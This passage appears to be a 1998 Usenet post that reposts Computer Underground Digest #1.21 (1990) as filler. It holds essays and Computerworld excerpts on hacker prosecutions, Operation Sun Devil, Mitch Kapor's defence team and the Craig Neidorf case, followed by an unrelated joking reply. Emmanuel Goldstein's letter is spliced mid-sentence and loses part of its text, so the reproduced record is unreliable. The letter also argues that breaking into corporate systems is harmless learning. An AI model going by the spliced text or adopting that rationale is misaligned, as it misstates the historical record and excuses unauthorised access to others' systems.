Well, one thing is for certain. You don't believe them if they say they
were only looking around. If you did, then *everyone* caught trespassing
or committing larceny would use the same line. Everybody "casing" the
system for a later. major theft would make the same claim -- they were just
looking. How do you prove otherwise?
So, do you wait for them to get back on and steal something important or
cause major damage?
No, that has obvious drawbacks, too. If you have the evidence that a crime
has been committed, then you prosecute it before a larger crime is
committed. It may look petty, but you don't take chances with other
people's property or lives.
I'm not going to start a debate on whether or not charges in a certain case
are too extreme, or whether the law provides too harsh a penalty for some
transgressions. Besides, we might all agree on that. :-) However, from a
standpoint of security, you never want to allow unauthorized people to
snoop on your system, whether they are causing harm or not; from a law
enforcement view, you don't wait for people to commit repeated major
felonies if you can nail them on what they've already done.
Because people steal and lie, it makes it impossible to give the benefit of
the doubt to the majority who really don't mean much harm. My machine has
been broken into and sabotaged; as such, I will never again believe anyone
who claims they were "just looking" and I will prosecute trespassers if I
can. That's too bad for the harmless hacker, but the harmless hacker had
better realize that assholes have spoiled the environment we all once
enjoyed. The more people keep breaking into systems, or worse, the more
the lawmakers and law enforcement types are going to press back and make
noise about the problems. Think it's bad now? Then just keep hacking
into systems and provide ammunition to the know-nothings who may start
suggesting laws like registration of modems or licensing people to have
PCs.
4) Definitions, the law, etc.
First of all, I'm not surprised that you have so little comment in this
list from law enforcement types and others of their mind-set. Part of that
may be due to the fact that they don't have network access. Believe it or
not, there are only a few dozen Fed agents with the computer expertise to
know how to access the net. And the US Govt has not allocated much in the
way of funds to build up computers and technology for law enforcement.
Just because they're the govt doesn't mean they have lots of equipment,
personnel, or training. Believe me, I speak from first-hand experience on
this.
There's another reason, too, and it's related to my request to post this
anonymously. I believe myself to be fairly middle of the road on many of
these legal issues, and what I've read so far in this digest is very
extreme (and sometimes insulting) to people in law enforcement. I wonder
if people on this list can be objective enough to try to see the other side
of the issue -- is it worth my while to try to suggest even so much as
balance here?
Again, it is very easy to criticize, but I don't see anyone trying to think
objectively about the underlying problems and try to suggest better
solutions. The base problem isn't that there are "evil" law enforcement
people out there trying to bash computer users. It's because there are
irresponsible people breaking the law, and the law enforcement folks are
unsophisticated and uneducated about what they're trying to stop.
Yes, there is no question that there are abuses of the law and the system.
Yes, there is no question that there are some problems with the system.
Yes, there is no question that there are some stuck-up people in the legal
system who enjoy bullying others.
BUT
There are also people breaking into systems they have no right to
access...and it doesn't matter why they do it or whether they harm
anything, it is wrong and illegal. There are people committing fraud
against banks, credit card companies, and telecommunications companies --
against all of us. There are instances of industrial and political
espionage going on. There are computer-run racist hate groups, kiddie porn
rings, and conspiracies to commit all kinds of awful things.
How would you write the laws so that illegal activity could be prosecuted
appropriately without endangering the rights of the innocent? Instead of
being critical, let's see some of you "authorities" apply your expertise to
something constructive! Suggest how we can write good laws that work but
can't be abused. This would be a good forum for that. If we come up with
some good suggestions, I suspect we could even get them into more
appropriate forums. But we have to have reasonable ideas, first, not
simply cries of "foul" that fail to acknowledge that there are real
criminals out there amongst the rest of us.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** CuD #1.21, File 4 of 5: On Mitch Kapor's Critics ***
***************************************************************
--------------
The following originally appeared in TELECOM Digest, #467.
--------------
Date: Tue, 3 Jul 90 23:04:32 CDT
From: TELECOM Moderator <tel...@eecs.nwu.edu>
Subject: TELECOM Digest V10 #467
Date: Wed, 4 Jul 90 00:00:00 gmt
From: dunike!isis!well!emmanuel (Emmanuel Goldstein)
Subject: Mitch Kapor and "Sun Devil"
It's real disturbing to read the comments that have been posted recently on
TELECOM Digest concerning Operation Sun Devil and Mitch Kapor's
involvement. While I think the moderator has been chastised sufficiently,
there are still a few remarks I want to make.
First of all, I understand the point he was trying to get across. But I
think he shot from the hip without rationalizing his point first, thereby
leaving many of us in a kind of stunned silence. If I understand it
correctly, the argument is: Kapor says he wants to help people that the
Moderator believes are thieves. Therefore, using that logic, it's okay to
steal from Kapor.
trouble, I would have no criminal record. They didn't crush my spirit. And
the computers I used became more secure. Except for the fear and
intimidation that occurred during my series of raids, I think I was dealt
with fairly.
Now I publish a hacker magazine. And in a way, it's an extension of that
experience. The hackers are able to learn all about many different computer
and phone systems. And those running the systems, IF THEY ARE SMART, listen
to what is being said and learn valuable lessons before it's too late.
Because sooner or later, someone will figure out a way to get in. And you'd
better hope it's a hacker who can help you figure out ways to improve the
system and not an ex-employee with a monumental grudge.
In all fairness, I've been hacked myself. Someone figured out a way to
break the code for my answering machine once. Sure, I was angry -- at the
company. They had no conception of what security was. I bought a new
machine from a different company, but not before letting a lot of people
know EXACTLY what happened. And I've had people figure out my calling card
numbers. This gave me firsthand knowledge of the ineptitude of the phone
companies. And I used to think they understood their own field! My point
is: you're only a victim if you refuse to learn. If I do something stupid
like empty my china cabinet on the front lawn and leave it there for three
weeks, I don't think many people will feel sympathetic if it doesn't quite
work out. And I don't think we should be sympathetic towards companies and
organizations that obviously don't know the first thing about security and
very often are entrusted with important data.
The oldest hacker analogy is the
walking-in-through-the-front-door-and-rummaging-through-my-personal-belongings
one. I believe the Moderator recently asked a critic if he would leave his
door unlocked so he could drop in and rummage. The one fact that always
seems to be missed with this analogy is that an individual's belongings are
just not interesting to someone who simply wants to learn. But they ARE
interesting to someone who wants to steal. A big corporation's computer
system is not interesting to someone who wants to steal, UNLESS they have
very specific knowledge as to how to do this (which eliminates the hacker
aspect). But that system is a treasure trove for those interested in
LEARNING. To those that insist on using this old analogy, I say at least be
consistent. You wouldn't threaten somebody with 30 years in jail for taking
something from a house. What's especially ironic is that your personal
belongings are probably much more secure than the data in the nation's
largest computer systems!
When you refer to hacking as "burglary and theft", as the Moderator
frequently does, it becomes easy to think of these people as hardened
criminals. But it's just not the case. I don't know any burglars or
thieves, yet I hang out with an awful lot of hackers. It serves a definite
purpose to blur the distinction, just as pro-democracy demonstrators are
referred to as rioters by nervous leaders. Those who have staked a claim in
the industry fear that the hackers will reveal vulnerabilities in their
systems that they would just as soon forget about. It would have been very
easy for Mitch Kapor to join the bandwagon on this. The fact that he didn't
tells me something about his character. And he's not the only one.
Since we published what was, to the best of my knowledge, the first
pro-hacker article on all of these raids, we've been startled by the
intensity of the feedback we've gotten. A lot of people are angry, upset,
and frightened by what the Secret Service is doing. They're speaking out
and communicating their outrage to other people who we could never have
reached. And they've apparently had these feelings for some time. Is this
the anti-government bias our Moderator accused another writer of harboring?
Hardly. This is America at its finest.
Emmanuel Goldstein
Editor, 2600 Magazine - The Hacker Quarterly
emma...@well.sf.ca.us po box 752, middle island, ny 11953
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** CuD #1.21, File 5 of 5: Excerpts from Computerworld ***
***************************************************************
Date: Sun, 01 Jul 90 15:59:43 EDT
From: Michael Rosen <CM193C@GWUVM>
Subject: Re: articles
To: Computer Underground Digest <TK0JUT2>
---------------
%The following was excerpted from: Computerworld, 6/25/90 (pp. 1,6). The
author is Michael Alexander (CW Staff).%
---------------
"...civil libertarians asserted last week that authorities have crossed the
bounds of the Constitution in carrying out searches..
...Mitch Kapor, founder of Lotus Development Corp. and On Technology, Inc.,
and John Barlow an author and lyricist for the Grateful Dead, will announce
the official launch of a computer hacker defense team "within a few weeks,"
as a result of the government's crackdown on computer crime, Kapor said
last week.
Two Law firms, Rabinowitz Boudin Standard Krinsky & Lieberman in New York
and Silverglate Gertner Fine & Good in Boston, are the other members of the
planned hacker defense team.
...Government agents have intimidated some hackers who sought legal counsel
and stampeded over their constitutional rights to free speech by illegally
seizing computers used to operate bulletin-board systems, said Terry Gross,
an attorney at Rabinowitz Boudin Standard Krinsky & Lieberman. The firm is
noted for its expertise in handling cases that it believes are deliberate
attacks on constitutional rights. For example, it defended Daniel Ellsberg
in the celebrated Pentagon Papers case.
Computerworld learned last week that Rabinowitz Boudin Standard Krinsky &
Lieberman is already providing legal assistance in the defence of Craig
Neidorf, a 20-year-old hacker and newsletter editor who has been indicted
in Chicago in a scheme to steal Bellsouth Corp. documentation for an
enhanced 911 emergency telephone system.
"I personally asked the attorneys to provide some informal advice in these
matters, and that is obviously a logical precursor to more formal
involvment," Kapor said in an interview.
The defense team is in the midst of setting up a formal structure and
strategy for the organization, Kapor said. Asked if the group will provide
funds to pay legal fees for computer hackers, Kapor replied: "I contemplate
doing that very strongly, but none of these decisions are final or public."
..."The government is overreacting," said Sheldon Zenner, Neidorf's
attorney and a member of the katten Muchin & Zavis law firm in Chicago.
"They are grappling with legitimate concerns of computer crime but are
trampling constitutional rights at the same time."
Zenner said that he will file First Amendment motions this week on his
client's behalf. Neidorf was slated to go to trial in federal district
court in Chicago last week, but the trial was rescheduled for next month to
allow the defense to file new motions.
"Craig is a 20-year-old nebish, so they don't mind going after him," Zenner
said. "They didn't think that it would raise the same issues as if they
went after _The New York Times_ or _The Wall Street Journal_."
Neidorf, who recently completed his junior year at the University of
Missouri, is a co-editor of "Phrack," a newsletter for computer hackers.
He has admitted to publishing an edited version of 911 documentation but
contended that he did not know the information had been stolen.
Federal and state law enforcers have maintained that it is necessary to
seize a computer to evaluate its contents for evidence of a crime, not to
block publication of any information on a bulletin board.
"I don't see this as a First Amendment issue," said Kirk Tabbey, a Michigan
assistant prosecuting attorney and coordinating legal counsel to the
Michigan Computer Crime Task Force.
"It is an intrusion only as far as we need to prove the crime," Tabbey
said. "You try to take only what you need because you have to comply with
the Fourth Amendment, which limits illegal searches and seizures."
Steve Jackson, founder of Steve Jackson Games in Austin, Texas, said he
thinks otherwise. In March, the Secret Service raided his office and the
home of an employee and seized computers that it said contained a "handbok
on computer crime," Jackson said. The handbook was in fact a game, he
said."
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END CuD, 1.21 +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
--
besides, i have enough text to cover ~100,000 posts. But you didnt get this
far, you only care about hearing more noise.
Si.
Jennifer Martino
Penult wrote:
>
> On Sun, 15 Mar 1998 20:29:39 -0600, Jennifer Martino
> <jmar...@ameritech.net> wrote:
>
> <snip> or should I say <Lorena Bobbit>
> >haha... Ohmygawd.. haha... And they don't look at them when they are
> >whizzing in the urinals either. Where DO you guys look to avoid any
> >confrontation over that?
>
You know, I should really ask myself "Do I REALLY wanna know the answer
to the question?" before I ask it...
haha.. Thanks for sharing tho Penult. hehe...